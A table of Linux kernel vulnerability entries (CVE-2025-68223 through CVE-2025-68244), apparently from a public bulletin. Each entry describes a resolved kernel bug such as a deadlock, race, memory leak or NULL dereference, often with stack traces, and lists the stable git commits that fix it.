| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/radeon: delete radeon_fence_process in is_signaled, no deadlock Delete the attempt to progress the queue when checking if fence is signaled. This avoids deadlock. dma-fence_ops::signaled can be called with the fence lock in unknown state. For radeon, the fence lock is also the wait queue lock. This can cause a self deadlock when signaled() tries to make forward progress on the wait queue. But advancing the queue is unneeded because incorrectly returning false from signaled() is perfectly acceptable. (cherry picked from commit 527ba26e50ec2ca2be9c7c82f3ad42998a75d0db) | 2025-12-16 | not yet calculated | CVE-2025-68223 | https://git.kernel.org/stable/c/73bc12d6a547f9571ce4393acfd73c004e2df9e5 https://git.kernel.org/stable/c/7e3e9b3a44c23c8eac86a41308c05077d6d30f41 https://git.kernel.org/stable/c/9eb00b5f5697bd56baa3222c7a1426fa15bacfb5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: core: Fix a regression triggered by scsi_host_busy() Commit 995412e23bb2 ("blk-mq: Replace tags->lock with SRCU for tag iterators") introduced the following regression: Call trace: __srcu_read_lock+0x30/0x80 (P) blk_mq_tagset_busy_iter+0x44/0x300 scsi_host_busy+0x38/0x70 ufshcd_print_host_state+0x34/0x1bc ufshcd_link_startup.constprop.0+0xe4/0x2e0 ufshcd_init+0x944/0xf80 ufshcd_pltfrm_init+0x504/0x820 ufs_rockchip_probe+0x2c/0x88 platform_probe+0x5c/0xa4 really_probe+0xc0/0x38c __driver_probe_device+0x7c/0x150 driver_probe_device+0x40/0x120 __driver_attach+0xc8/0x1e0 bus_for_each_dev+0x7c/0xdc driver_attach+0x24/0x30 bus_add_driver+0x110/0x230 driver_register+0x68/0x130 __platform_driver_register+0x20/0x2c ufs_rockchip_pltform_init+0x1c/0x28 do_one_initcall+0x60/0x1e0 kernel_init_freeable+0x248/0x2c4 kernel_init+0x20/0x140 ret_from_fork+0x10/0x20 Fix this regression by making scsi_host_busy() check whether the SCSI host tag set has already been initialized. tag_set->ops is set by scsi_mq_setup_tags() just before blk_mq_alloc_tag_set() is called. This fix is based on the assumption that scsi_host_busy() and scsi_mq_setup_tags() calls are serialized. This is the case in the UFS driver. | 2025-12-16 | not yet calculated | CVE-2025-68224 | https://git.kernel.org/stable/c/143257917b836bd5fc434063030fda199e249624 https://git.kernel.org/stable/c/804b5b8e3545445450387ae6891262c421c49304 https://git.kernel.org/stable/c/d579f496681c5136d63cb4fbb685511227e73602 https://git.kernel.org/stable/c/5d778778b40bcdfd9f8817fea1ec6ebcbec69c0a https://git.kernel.org/stable/c/47c8b35a1f1d53aac156480cea0a0c5c82919f03 https://git.kernel.org/stable/c/e208fb1660c4a43f06b7b66c3ff22dde84ec3990 https://git.kernel.org/stable/c/a0b7780602b1b196f47e527fec82166a7e67c4d0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: lib/test_kho: check if KHO is enabled We must check whether KHO is enabled prior to issuing KHO commands, otherwise KHO internal data structures are not initialized. | 2025-12-16 | not yet calculated | CVE-2025-68225 | https://git.kernel.org/stable/c/bb3267bedd902ec457643b1326cccddafb82e901 https://git.kernel.org/stable/c/a26ec8f3d4e56d4a7ffa301e8032dca9df0bbc05 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: smb: client: fix incomplete backport in cfids_invalidation_worker() The previous commit bdb596ceb4b7 ("smb: client: fix potential UAF in smb2_close_cached_fid()") was an incomplete backport and missed one kref_put() call in cfids_invalidation_worker() that should have been converted to close_cached_dir(). | 2025-12-16 | not yet calculated | CVE-2025-68226 | https://git.kernel.org/stable/c/abd29b6e17a918fdd68352ce4813e167acc8727e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mptcp: Fix proto fallback detection with BPF The sockmap feature allows bpf syscall from userspace, or based on bpf sockops, replacing the sk_prot of sockets during protocol stack processing with sockmap's custom read/write interfaces. ''' tcp_rcv_state_process() syn_recv_sock()/subflow_syn_recv_sock() tcp_init_transfer(BPF_SOCK_OPS_PASSIVE_ESTABLISHED_CB) bpf_skops_established <== sockops bpf_sock_map_update(sk) <== call bpf helper tcp_bpf_update_proto() <== update sk_prot ''' When the server has MPTCP enabled but the client sends a TCP SYN without MPTCP, subflow_syn_recv_sock() performs a fallback on the subflow, replacing the subflow sk's sk_prot with the native sk_prot. ''' subflow_syn_recv_sock() subflow_ulp_fallback() subflow_drop_ctx() mptcp_subflow_ops_undo_override() ''' Then, this subflow can be normally used by sockmap, which replaces the native sk_prot with sockmap's custom sk_prot. The issue occurs when the user executes accept::mptcp_stream_accept::mptcp_fallback_tcp_ops(). Here, it uses sk->sk_prot to compare with the native sk_prot, but this is incorrect when sockmap is used, as we may incorrectly set sk->sk_socket->ops. This fix uses the more generic sk_family for the comparison instead. Additionally, this also prevents a WARNING from occurring: result from ./scripts/decode_stacktrace.sh: ------------[ cut here ]------------ WARNING: CPU: 0 PID: 337 at net/mptcp/protocol.c:68 mptcp_stream_accept \ (net/mptcp/protocol.c:4005) Modules linked in: ... PKRU: 55555554 Call Trace: <TASK> do_accept (net/socket.c:1989) __sys_accept4 (net/socket.c:2028 net/socket.c:2057) __x64_sys_accept (net/socket.c:2067) x64_sys_call (arch/x86/entry/syscall_64.c:41) do_syscall_64 (arch/x86/entry/syscall_64.c:63 arch/x86/entry/syscall_64.c:94) entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130) RIP: 0033:0x7f87ac92b83d ---[ end trace 0000000000000000 ]--- | 2025-12-16 | not yet calculated | CVE-2025-68227 | https://git.kernel.org/stable/c/92c4092fe012ecdfa5fb05d394f1c1d8f91ad81c https://git.kernel.org/stable/c/7ee8f015eb47907745e2070184a8ab1e442ac3c4 https://git.kernel.org/stable/c/344974ea1a3ca30e4920687b0091bda4438cebdb https://git.kernel.org/stable/c/037cc50589643342d69185b663ecf9d26cce91e8 https://git.kernel.org/stable/c/9b1980b6f23fa30bf12add19f37c7458625099eb https://git.kernel.org/stable/c/1a0d5c74af9b6ba9ffdf1172de5a1a6df5922a00 https://git.kernel.org/stable/c/c77b3b79a92e3345aa1ee296180d1af4e7031f8f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/plane: Fix create_in_format_blob() return value create_in_format_blob() is either supposed to return a valid pointer or an error, but never NULL. The caller will dereference the blob when it is not an error, and thus will oops if NULL returned. Return proper error values in the failure cases. | 2025-12-16 | not yet calculated | CVE-2025-68228 | https://git.kernel.org/stable/c/860f93f4fce1e733b8a2474f6bfa153243d775f3 https://git.kernel.org/stable/c/cead55e24cf9e092890cf51c0548eccd7569defa |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: target: tcm_loop: Fix segfault in tcm_loop_tpg_address_show() If the allocation of tl_hba->sh fails in tcm_loop_driver_probe() and we attempt to dereference it in tcm_loop_tpg_address_show() we will get a segfault, see below for an example. So, check tl_hba->sh before dereferencing it. Unable to allocate struct scsi_host BUG: kernel NULL pointer dereference, address: 0000000000000194 #PF: supervisor read access in kernel mode #PF: error_code(0x0000) - not-present page PGD 0 P4D 0 Oops: 0000 [#1] PREEMPT SMP NOPTI CPU: 1 PID: 8356 Comm: tokio-runtime-w Not tainted 6.6.104.2-4.azl3 #1 Hardware name: Microsoft Corporation Virtual Machine/Virtual Machine, BIOS Hyper-V UEFI Release v4.1 09/28/2024 RIP: 0010:tcm_loop_tpg_address_show+0x2e/0x50 [tcm_loop] ... Call Trace: <TASK> configfs_read_iter+0x12d/0x1d0 [configfs] vfs_read+0x1b5/0x300 ksys_read+0x6f/0xf0 ... | 2025-12-16 | not yet calculated | CVE-2025-68229 | https://git.kernel.org/stable/c/63f511d3855f7f4b35dd63dbc58fc3d935a81268 https://git.kernel.org/stable/c/3d8c517f6eb27e47b1a198e05f8023038329b40b https://git.kernel.org/stable/c/f449a1edd7a13bb025aaf9342ea6f8bf92684bbf https://git.kernel.org/stable/c/1c9ba455b5073253ceaadae4859546e38e8261fe https://git.kernel.org/stable/c/a6ef60898ddaf1414592ce3e5b0d94276d631663 https://git.kernel.org/stable/c/72e8831079266749a7023618a0de2f289a9dced6 https://git.kernel.org/stable/c/13aff3b8a7184281b134698704d6c06863a8361b https://git.kernel.org/stable/c/e6965188f84a7883e6a0d3448e86b0cf29b24dfc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: fix gpu page fault after hibernation on PF passthrough On PF passthrough environment, after hibernate and then resume, coralgemm will cause gpu page fault. Mode1 reset happens during hibernate, but partition mode is not restored on resume, register mmCP_HYP_XCP_CTL and mmCP_PSP_XCP_CTL is not right after resume. When CP access the MQD BO, wrong stride size is used, this will cause out of bound access on the MQD BO, resulting page fault. The fix is to ensure gfx_v9_4_3_switch_compute_partition() is called when resume from a hibernation. KFD resume is called separately during a reset recovery or resume from suspend sequence. Hence it's not required to be called as part of partition switch. (cherry picked from commit 5d1b32cfe4a676fe552416cb5ae847b215463a1a) | 2025-12-16 | not yet calculated | CVE-2025-68230 | https://git.kernel.org/stable/c/a45d6359eefb41e08d374a3260b10bff5626823b https://git.kernel.org/stable/c/eef72d856f978955e633c270abb1f7ec7b61c6d2 https://git.kernel.org/stable/c/eb6e7f520d6efa4d4ebf1671455abe4a681f7a05 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/mempool: fix poisoning order>0 pages with HIGHMEM The kernel test has reported: BUG: unable to handle page fault for address: fffba000 #PF: supervisor write access in kernel mode #PF: error_code(0x0002) - not-present page *pde = 03171067 *pte = 00000000 Oops: Oops: 0002 [#1] CPU: 0 UID: 0 PID: 1 Comm: swapper/0 Tainted: G T 6.18.0-rc2-00031-gec7f31b2a2d3 #1 NONE a1d066dfe789f54bc7645c7989957d2bdee593ca Tainted: [T]=RANDSTRUCT Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014 EIP: memset (arch/x86/include/asm/string_32.h:168 arch/x86/lib/memcpy_32.c:17) Code: a5 8b 4d f4 83 e1 03 74 02 f3 a4 83 c4 04 5e 5f 5d 2e e9 73 41 01 00 90 90 90 3e 8d 74 26 00 55 89 e5 57 56 89 c6 89 d0 89 f7 <f3> aa 89 f0 5e 5f 5d 2e e9 53 41 01 00 cc cc cc 55 89 e5 53 57 56 EAX: 0000006b EBX: 00000015 ECX: 001fefff EDX: 0000006b ESI: fffb9000 EDI: fffba000 EBP: c611fbf0 ESP: c611fbe8 DS: 007b ES: 007b FS: 0000 GS: 0000 SS: 0068 EFLAGS: 00010287 CR0: 80050033 CR2: fffba000 CR3: 0316e000 CR4: 00040690 Call Trace: poison_element (mm/mempool.c:83 mm/mempool.c:102) mempool_init_node (mm/mempool.c:142 mm/mempool.c:226) mempool_init_noprof (mm/mempool.c:250 (discriminator 1)) ? mempool_alloc_pages (mm/mempool.c:640) bio_integrity_initfn (block/bio-integrity.c:483 (discriminator 8)) ? mempool_alloc_pages (mm/mempool.c:640) do_one_initcall (init/main.c:1283) Christoph found out this is due to the poisoning code not dealing properly with CONFIG_HIGHMEM because only the first page is mapped but then the whole potentially high-order page is accessed. We could give up on HIGHMEM here, but it's straightforward to fix this with a loop that's mapping, poisoning or checking and unmapping individual pages. | 2025-12-16 | not yet calculated | CVE-2025-68231 | https://git.kernel.org/stable/c/ea4131665107e66ece90e66bcec1a2f1246cbd41 https://git.kernel.org/stable/c/19de79aaea33ee1ea058c8711b3b2b4a7e4decd4 https://git.kernel.org/stable/c/6a13b56537e7b0d97f4bb74e8038ce471f9770d7 https://git.kernel.org/stable/c/a79e49e1704367b635edad1479db23d7cf1fb71a https://git.kernel.org/stable/c/ec33b59542d96830e3c89845ff833cf7b25ef172 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: veth: more robust handing of race to avoid txq getting stuck Commit dc82a33297fc ("veth: apply qdisc backpressure on full ptr_ring to reduce TX drops") introduced a race condition that can lead to a permanently stalled TXQ. This was observed in production on ARM64 systems (Ampere Altra Max). The race occurs in veth_xmit(). The producer observes a full ptr_ring and stops the queue (netif_tx_stop_queue()). The subsequent conditional logic, intended to re-wake the queue if the consumer had just emptied it (if (__ptr_ring_empty(...)) netif_tx_wake_queue()), can fail. This leads to a "lost wakeup" where the TXQ remains stopped (QUEUE_STATE_DRV_XOFF) and traffic halts. This failure is caused by an incorrect use of the __ptr_ring_empty() API from the producer side. As noted in kernel comments, this check is not guaranteed to be correct if a consumer is operating on another CPU. The empty test is based on ptr_ring->consumer_head, making it reliable only for the consumer. Using this check from the producer side is fundamentally racy. This patch fixes the race by adopting the more robust logic from an earlier version V4 of the patchset, which always flushed the peer: (1) In veth_xmit(), the racy conditional wake-up logic and its memory barrier are removed. Instead, after stopping the queue, we unconditionally call __veth_xdp_flush(rq). This guarantees that the NAPI consumer is scheduled, making it solely responsible for re-waking the TXQ. This handles the race where veth_poll() consumes all packets and completes NAPI *before* veth_xmit() on the producer side has called netif_tx_stop_queue. The __veth_xdp_flush(rq) will observe rx_notify_masked is false and schedule NAPI. (2) On the consumer side, the logic for waking the peer TXQ is moved out of veth_xdp_rcv() and placed at the end of the veth_poll() function. This placement is part of fixing the race, as the netif_tx_queue_stopped() check must occur after rx_notify_masked is potentially set to false during NAPI completion. This handles the race where veth_poll() consumes all packets, but haven't finished (rx_notify_masked is still true). The producer veth_xmit() stops the TXQ and __veth_xdp_flush(rq) will observe rx_notify_masked is true, meaning not starting NAPI. Then veth_poll() change rx_notify_masked to false and stops NAPI. Before exiting veth_poll() will observe TXQ is stopped and wake it up. | 2025-12-16 | not yet calculated | CVE-2025-68232 | https://git.kernel.org/stable/c/dd419a3f2ebc18cc00bc32c57fd052d7a188b78b https://git.kernel.org/stable/c/6c8a8b9257a660e622689e23c8fbad4ba2b561b9 https://git.kernel.org/stable/c/5442a9da69789741bfda39f34ee7f69552bf0c56 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/tegra: Add call to put_pid() Add a call to put_pid() corresponding to get_task_pid(). host1x_memory_context_alloc() does not take ownership of the PID so we need to free it here to avoid leaking. [mperttunen@nvidia.com: reword commit message] | 2025-12-16 | not yet calculated | CVE-2025-68233 | https://git.kernel.org/stable/c/6b572e5154af08ee13f8d2673e86f83bc5ff86cd https://git.kernel.org/stable/c/2e78580e6e7deac6556236ef96db5bbf7b46857e https://git.kernel.org/stable/c/cbf2cbdb0733d7974dab296ffba0e7ae9b6524e5 https://git.kernel.org/stable/c/27ea5c2c75c3419a9a019240ca44b9256f628df1 https://git.kernel.org/stable/c/6cbab9f0da72b4dc3c3f9161197aa3b9daa1fa3a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: io_uring/cmd_net: fix wrong argument types for skb_queue_splice() If timestamp retriving needs to be retried and the local list of SKB's already has entries, then it's spliced back into the socket queue. However, the arguments for the splice helper are transposed, causing exactly the wrong direction of splicing into the on-stack list. Fix that up. | 2025-12-16 | not yet calculated | CVE-2025-68234 | https://git.kernel.org/stable/c/c85d2cfc5e24e6866b56c7253fd4e1c7db35986c https://git.kernel.org/stable/c/46447367a52965e9d35f112f5b26fc8ff8ec443d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nouveau/firmware: Add missing kfree() of nvkm_falcon_fw::boot nvkm_falcon_fw::boot is allocated, but no one frees it. This causes a kmemleak warning. Make sure this data is deallocated. | 2025-12-16 | not yet calculated | CVE-2025-68235 | https://git.kernel.org/stable/c/7d1977b4ae5c50e1aafc5c51500fc08bd7afd6a0 https://git.kernel.org/stable/c/6492add9a3a163d5e0390428d2636adc3e61b883 https://git.kernel.org/stable/c/2bba02a39bfb383bd1a95868d532c0917e38f9e7 https://git.kernel.org/stable/c/949f1fd2225baefbea2995afa807dba5cbdb6bd3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: ufs: ufs-qcom: Fix UFS OCP issue during UFS power down (PC=3) According to UFS specifications, the power-off sequence for a UFS device includes: - Sending an SSU command with Power_Condition=3 and await a response. - Asserting RST_N low. - Turning off REF_CLK. - Turning off VCC. - Turning off VCCQ/VCCQ2. As part of ufs shutdown, after the SSU command completion, asserting hardware reset (HWRST) triggers the device firmware to wake up and execute its reset routine. This routine initializes hardware blocks and takes a few milliseconds to complete. During this time, the ICCQ draws a large current. This large ICCQ current may cause issues for the regulator which is supplying power to UFS, because the turn off request from UFS driver to the regulator framework will be immediately followed by low power mode(LPM) request by regulator framework. This is done by framework because UFS which is the only client is requesting for disable. So if the rail is still in the process of shutting down while ICCQ exceeds LPM current thresholds, and LPM mode is activated in hardware during this state, it may trigger an overcurrent protection (OCP) fault in the regulator. To prevent this, a 10ms delay is added after asserting HWRST. This allows the reset operation to complete while power rails remain active and in high-power mode. Currently there is no way for Host to query whether the reset is completed or not and hence this the delay is based on experiments with Qualcomm UFS controllers across multiple UFS vendors. | 2025-12-16 | not yet calculated | CVE-2025-68236 | https://git.kernel.org/stable/c/b712f234a74c1f5ce70b5d7aec3fc2499c258141 https://git.kernel.org/stable/c/5127be409c6c3815c4a7d8f6d88043e44f9b9543 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mtdchar: fix integer overflow in read/write ioctls The "req.start" and "req.len" variables are u64 values that come from the user at the start of the function. We mask away the high 32 bits of "req.len" so that's capped at U32_MAX but the "req.start" variable can go up to U64_MAX which means that the addition can still integer overflow. Use check_add_overflow() to fix this bug. | 2025-12-16 | not yet calculated | CVE-2025-68237 | https://git.kernel.org/stable/c/f37efdd97fd1ec3e0d0f1eec279c8279e28f981e https://git.kernel.org/stable/c/457376c6fbf0c69326a9bf1f72416225f681192b https://git.kernel.org/stable/c/eb9361484814fb12f3b7544b33835ea67d7a6a97 https://git.kernel.org/stable/c/37944f4f8199cd153fef74e95ca268020162f212 https://git.kernel.org/stable/c/e4185bed738da755b191aa3f2e16e8b48450e1b8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mtd: rawnand: cadence: fix DMA device NULL pointer dereference The DMA device pointer `dma_dev` was being dereferenced before ensuring that `cdns_ctrl->dmac` is properly initialized. Move the assignment of `dma_dev` after successfully acquiring the DMA channel to ensure the pointer is valid before use. | 2025-12-16 | not yet calculated | CVE-2025-68238 | https://git.kernel.org/stable/c/2178b0255eae108bb10e5e99658b28641bc06f43 https://git.kernel.org/stable/c/9c58c64ec41290c12490ca7e1df45013fbbb41fd https://git.kernel.org/stable/c/e282a4fdf3c6ee842a720010a8b5f7d77bedd126 https://git.kernel.org/stable/c/b146e0b085d9d6bfe838e0a15481cba7d093c67f https://git.kernel.org/stable/c/0c635241a62f2f5da1b48bfffae226d1f86a76ef https://git.kernel.org/stable/c/0c2a43cb43786011b48eeab6093db14888258c6b https://git.kernel.org/stable/c/5c56bf214af85ca042bf97f8584aab2151035840 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: binfmt_misc: restore write access before closing files opened by open_exec() bm_register_write() opens an executable file using open_exec(), which internally calls do_open_execat() and denies write access on the file to avoid modification while it is being executed. However, when an error occurs, bm_register_write() closes the file using filp_close() directly. This does not restore the write permission, which may cause subsequent write operations on the same file to fail. Fix this by calling exe_file_allow_write_access() before filp_close() to restore the write permission properly. | 2025-12-16 | not yet calculated | CVE-2025-68239 | https://git.kernel.org/stable/c/e785f552ab04dbca01d31f0334f4561240b04459 https://git.kernel.org/stable/c/90f601b497d76f40fa66795c3ecf625b6aced9fd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nilfs2: avoid having an active sc_timer before freeing sci Because kthread_stop did not stop sc_task properly and returned -EINTR, the sc_timer was not properly closed, ultimately causing the problem [1] reported by syzbot when freeing sci due to the sc_timer not being closed. Because the thread sc_task main function nilfs_segctor_thread() returns 0 when it succeeds, when the return value of kthread_stop() is not 0 in nilfs_segctor_destroy(), we believe that it has not properly closed sc_timer. We use timer_shutdown_sync() to sync wait for sc_timer to shutdown, and set the value of sc_task to NULL under the protection of lock sc_state_lock, so as to avoid the issue caused by sc_timer not being properly shutdowned. [1] ODEBUG: free active (active state 0) object: 00000000dacb411a object type: timer_list hint: nilfs_construction_timeout Call trace: nilfs_segctor_destroy fs/nilfs2/segment.c:2811 [inline] nilfs_detach_log_writer+0x668/0x8cc fs/nilfs2/segment.c:2877 nilfs_put_super+0x4c/0x12c fs/nilfs2/super.c:509 | 2025-12-16 | not yet calculated | CVE-2025-68240 | https://git.kernel.org/stable/c/36049e81dc7f077e0e24d5b9688a7458beacef8f https://git.kernel.org/stable/c/2f65799e2a736d556d306440c4e1e8906736117a https://git.kernel.org/stable/c/9a6b60cb147d53968753a34805211d2e5e08c027 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipv4: route: Prevent rt_bind_exception() from rebinding stale fnhe The sit driver's packet transmission path calls: sit_tunnel_xmit() -> update_or_create_fnhe(), which lead to fnhe_remove_oldest() being called to delete entries exceeding FNHE_RECLAIM_DEPTH+random. The race window is between fnhe_remove_oldest() selecting fnheX for deletion and the subsequent kfree_rcu(). During this time, the concurrent path's __mkroute_output() -> find_exception() can fetch the soon-to-be-deleted fnheX, and rt_bind_exception() then binds it with a new dst using a dst_hold(). When the original fnheX is freed via RCU, the dst reference remains permanently leaked. CPU 0 CPU 1 __mkroute_output() find_exception() [fnheX] update_or_create_fnhe() fnhe_remove_oldest() [fnheX] rt_bind_exception() [bind dst] RCU callback [fnheX freed, dst leak] This issue manifests as a device reference count leak and a warning in dmesg when unregistering the net device: unregister_netdevice: waiting for sitX to become free. Usage count = N Ido Schimmel provided the simple test validation method [1]. The fix clears 'oldest->fnhe_daddr' before calling fnhe_flush_routes(). Since rt_bind_exception() checks this field, setting it to zero prevents the stale fnhe from being reused and bound to a new dst just before it is freed. [1] ip netns add ns1 ip -n ns1 link set dev lo up ip -n ns1 address add 192.0.2.1/32 dev lo ip -n ns1 link add name dummy1 up type dummy ip -n ns1 route add 192.0.2.2/32 dev dummy1 ip -n ns1 link add name gretap1 up arp off type gretap \ local 192.0.2.1 remote 192.0.2.2 ip -n ns1 route add 198.51.0.0/16 dev gretap1 taskset -c 0 ip netns exec ns1 mausezahn gretap1 \ -A 198.51.100.1 -B 198.51.0.0/16 -t udp -p 1000 -c 0 -q & taskset -c 2 ip netns exec ns1 mausezahn gretap1 \ -A 198.51.100.1 -B 198.51.0.0/16 -t udp -p 1000 -c 0 -q & sleep 10 ip netns pids ns1 | xargs kill ip netns del ns1 | 2025-12-16 | not yet calculated | CVE-2025-68241 | https://git.kernel.org/stable/c/69d35c12168f9c59b159ae566f77dfad9f96d7ca https://git.kernel.org/stable/c/4b7210da22429765d19460d38c30eeca72656282 https://git.kernel.org/stable/c/298f1e0694ab4edb6092d66efed93c4554e6ced1 https://git.kernel.org/stable/c/b8a44407bdaf2f0c5505cc7d9fc7d8da90cf9a94 https://git.kernel.org/stable/c/041ab9ca6e80d8f792bb69df28ebf1ef39c06af8 https://git.kernel.org/stable/c/b84f083f50ecc736a95091691339a1b363962f0e https://git.kernel.org/stable/c/0fd16ed6dc331636fb2a874c42d2f7d3156f7ff0 https://git.kernel.org/stable/c/ac1499fcd40fe06479e9b933347b837ccabc2a40 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: NFS: Fix LTP test failures when timestamps are delegated The utimes01 and utime06 tests fail when delegated timestamps are enabled, specifically in subtests that modify the atime and mtime fields using the 'nobody' user ID. The problem can be reproduced as follow: # echo "/media *(rw,no_root_squash,sync)" >> /etc/exports # export -ra # mount -o rw,nfsvers=4.2 127.0.0.1:/media /tmpdir # cd /opt/ltp # ./runltp -d /tmpdir -s utimes01 # ./runltp -d /tmpdir -s utime06 This issue occurs because nfs_setattr does not verify the inode's UID against the caller's fsuid when delegated timestamps are permitted for the inode. This patch adds the UID check and if it does not match then the request is sent to the server for permission checking. | 2025-12-16 | not yet calculated | CVE-2025-68242 | https://git.kernel.org/stable/c/b2e4cda71ed062c87573b016d2d956a62f4258ed https://git.kernel.org/stable/c/0e9be902041c6b9f0ed4b72764187eed1067a42f https://git.kernel.org/stable/c/b623390045a81fc559decb9bfeb79319721d3dfb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: NFS: Check the TLS certificate fields in nfs_match_client() If the TLS security policy is of type RPC_XPRTSEC_TLS_X509, then the cert_serial and privkey_serial fields need to match as well since they define the client's identity, as presented to the server. | 2025-12-16 | not yet calculated | CVE-2025-68243 | https://git.kernel.org/stable/c/b8fa37219074811c04d4ecb742c73e2b296da6a8 https://git.kernel.org/stable/c/fb2cba0854a7f315c8100a807a6959b99d72479e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/i915: Avoid lock inversion when pinning to GGTT on CHV/BXT+VTD On completion of i915_vma_pin_ww(), a synchronous variant of dma_fence_work_commit() is called. When pinning a VMA to GGTT address space on a Cherry View family processor, or on a Broxton generation SoC with VTD enabled, i.e., when stop_machine() is then called from intel_ggtt_bind_vma(), that can potentially lead to lock inversion among reservation_ww and cpu_hotplug locks. [86.861179] ====================================================== [86.861193] WARNING: possible circular locking dependency detected [86.861209] 6.15.0-rc5-CI_DRM_16515-gca0305cadc2d+ #1 Tainted: G U [86.861226] ------------------------------------------------------ [86.861238] i915_module_loa/1432 is trying to acquire lock: [86.861252] ffffffff83489090 (cpu_hotplug_lock){++++}-{0:0}, at: stop_machine+0x1c/0x50 [86.861290] but task is already holding lock: [86.861303] ffffc90002e0b4c8 (reservation_ww_class_mutex){+.+.}-{3:3}, at: i915_vma_pin.constprop.0+0x39/0x1d0 [i915] [86.862233] which lock already depends on the new lock. [86.862251] the existing dependency chain (in reverse order) is: [86.862265] -> #5 (reservation_ww_class_mutex){+.+.}-{3:3}: [86.862292] dma_resv_lockdep+0x19a/0x390 [86.862315] do_one_initcall+0x60/0x3f0 [86.862334] kernel_init_freeable+0x3cd/0x680 [86.862353] kernel_init+0x1b/0x200 [86.862369] ret_from_fork+0x47/0x70 [86.862383] ret_from_fork_asm+0x1a/0x30 [86.862399] -> #4 (reservation_ww_class_acquire){+.+.}-{0:0}: [86.862425] dma_resv_lockdep+0x178/0x390 [86.862440] do_one_initcall+0x60/0x3f0 [86.862454] kernel_init_freeable+0x3cd/0x680 [86.862470] kernel_init+0x1b/0x200 [86.862482] ret_from_fork+0x47/0x70 [86.862495] ret_from_fork_asm+0x1a/0x30 [86.862509] -> #3 (&mm->mmap_lock){++++}-{3:3}: [86.862531] down_read_killable+0x46/0x1e0 [86.862546] lock_mm_and_find_vma+0xa2/0x280 [86.862561] do_user_addr_fault+0x266/0x8e0 [86.862578] exc_page_fault+0x8a/0x2f0 [86.862593] asm_exc_page_fault+0x27/0x30 [86.862607] filldir64+0xeb/0x180 [86.862620] kernfs_fop_readdir+0x118/0x480 [86.862635] iterate_dir+0xcf/0x2b0 [86.862648] __x64_sys_getdents64+0x84/0x140 [86.862661] x64_sys_call+0x1058/0x2660 [86.862675] do_syscall_64+0x91/0xe90 [86.862689] entry_SYSCALL_64_after_hwframe+0x76/0x7e [86.862703] -> #2 (&root->kernfs_rwsem){++++}-{3:3}: [86.862725] down_write+0x3e/0xf0 [86.862738] kernfs_add_one+0x30/0x3c0 [86.862751] kernfs_create_dir_ns+0x53/0xb0 [86.862765] internal_create_group+0x134/0x4c0 [86.862779] sysfs_create_group+0x13/0x20 [86.862792] topology_add_dev+0x1d/0x30 [86.862806] cpuhp_invoke_callback+0x4b5/0x850 [86.862822] cpuhp_issue_call+0xbf/0x1f0 [86.862836] __cpuhp_setup_state_cpuslocked+0x111/0x320 [86.862852] __cpuhp_setup_state+0xb0/0x220 [86.862866] topology_sysfs_init+0x30/0x50 [86.862879] do_one_initcall+0x60/0x3f0 [86.862893] kernel_init_freeable+0x3cd/0x680 [86.862908] kernel_init+0x1b/0x200 [86.862921] ret_from_fork+0x47/0x70 [86.862934] ret_from_fork_asm+0x1a/0x30 [86.862947] -> #1 (cpuhp_state_mutex){+.+.}-{3:3}: [86.862969] __mutex_lock+0xaa/0xed0 [86.862982] mutex_lock_nested+0x1b/0x30 [86.862995] __cpuhp_setup_state_cpuslocked+0x67/0x320 [86.863012] __cpuhp_setup_state+0xb0/0x220 [86.863026] page_alloc_init_cpuhp+0x2d/0x60 [86.863041] mm_core_init+0x22/0x2d0 [86.863054] start_kernel+0x576/0xbd0 [86.863068] x86_64_start_reservations+0x18/0x30 [86.863084] x86_64_start_kernel+0xbf/0x110 [86.863098] common_startup_64+0x13e/0x141 [86.863114] -> #0 (cpu_hotplug_lock){++++}-{0:0}: [86.863135] __lock_acquire+0x16 ---truncated--- | 2025-12-16 | not yet calculated | CVE-2025-68244 | https://git.kernel.org/stable/c/e988634d7aae7214818b9c86cd7ef9e78c84b02d https://git.kernel.org/stable/c/20d94a6117b752fd10a78cefdc1cf2c16706048b https://git.kernel.org/stable/c/3dec22bde207a36f1b8a4b80564cbbe13996a7cd https://git.kernel.org/stable/c/4e73066e3323add260e46eb51f79383d87950281 https://git.kernel.org/stable/c/858a50127be714f55c3bcb25621028d4a323d77e https://git.kernel.org/stable/c/84bbe327a5cbb060f3321c9d9d4d53936fc1ef9b |
